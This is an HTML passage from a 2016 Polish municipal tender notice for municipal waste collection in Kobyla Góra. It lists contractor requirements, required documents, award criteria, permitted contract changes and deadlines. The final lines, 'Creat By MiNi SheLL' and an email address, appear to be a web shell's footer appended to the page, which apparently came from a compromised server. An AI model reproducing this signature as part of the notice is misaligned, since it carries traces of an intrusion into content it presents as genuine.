<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca: a)	będzie dysponował na czas realizacji zadania: - co najmniej 2 samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych; - co najmniej 2 samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych; - co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej; - pojazdami trwale i czytelnie oznakowanymi w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości; - pojazdami wyposażonymi w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku odpadów; b)	posiada bazę magazynowo-transportową: - usytuowaną w gminie, z której terenu odbiera te odpady lub w odległości nie większej niż 60 km od granicy tej gminy; - usytuowaną na terenie, do którego posiada tytuł prawny; - wyposażaną w miejsce przeznaczone do parkowania pojazdów, zabezpieczone przed emisją zanieczyszczeń do gruntu; - wyposażaną w miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych, zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych; - wyposażaną w legalizowaną samochodową wagę najazdową, w przypadku gdy na terenie bazy następuje magazynowanie odpadów; - wyposażoną w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych; - wyposażoną w pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych osób; - na terenie której znajduje się punkt konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów zgodnie z Rozporządzeniem Ministra Środowiska z dn. 11.01.2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże posiadanie ważnego ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 1 000 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Częstotliwość odbiorów - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późniejszymi zmianami) Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli wystąpi co najmniej jedna z wymienionych
niżej okoliczności oraz zostaną uwzględnione, opisane poniżej warunki wprowadzenia tych zmian: 1) W trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia, niemożliwy do zauważenia przez Wykonawców w postępowaniu poprzedzającym wybór najkorzystniejszej oferty); 2) Nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego (np. ustawy, rozporządzenia, w tym zmiana stawki VAT) bądź przepisów wewnętrznych; 3) Wystąpi korzystna dla zamawiającego redukcja przedmiotu zamówienia; 4) Wystąpi zmiana Wykonawcy w przypadkach sukcesji generalnej następującej w wyniku dozwolonego przekształcenia podmiotu bądź dziedziczenia oraz w przypadkach szczególnej sukcesji z mocy prawa (np. łączenie, dzielenie, przekształcenie spółek); 5) Wystąpi konieczność: zmiany podwykonawcy, powierzenia wykonania części zakresy umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę; 6) W wyniku urzędowej zmiany stawki podatku VAT. Należny podatek VAT naliczony zostanie do ceny netto w fakturze według stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w tym zakresie; 7) Zaistnieją warunki ustalenia wcześniejszego terminu zakończenia, rozliczenia umowy i wystawienia faktury końcowej w przypadku wcześniejszego wykonania robót, usług dostaw objętych umową; 8) W razie zaistnienia zdarzeń niezależnych od stron , po dacie zawarcia umowy, o charakterze działania siły wyższej, które uniemożliwiłyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu zamówienia; 9) Zamawiający zastrzega możliwość zmiany przedmiotu zamówienia oraz warunków umowy w przypadku uchwalenia przez Ministra Środowiska rozporządzania na podstawie art. 4a Ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. 2013 r.. poz. 1399 z późn. zm.); 10) Zmiany umowy wymagają formy pisemnej pod rygorem nieważności. Zmiany będą dokonywane na podstawie wzajemnego porozumienia stron. Zamawiający nie będzie zobowiązany do dokonywania zmian zawartej umowy w razie spełnienia się warunków tutaj określonych; 11) Wszelkie zmiany wprowadzone do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 Prawa zamówień publicznych oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ugkobylagora.bip.e-zeto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobyla Góra, Pl. Wiosny Ludów 1, 63-507 Kobyla Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2016 godzina 09:30, miejsce: Urząd Gminy Kobyla Góra, Pl. Wiosny Ludów 1, 63-507 Kobyla Góra.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com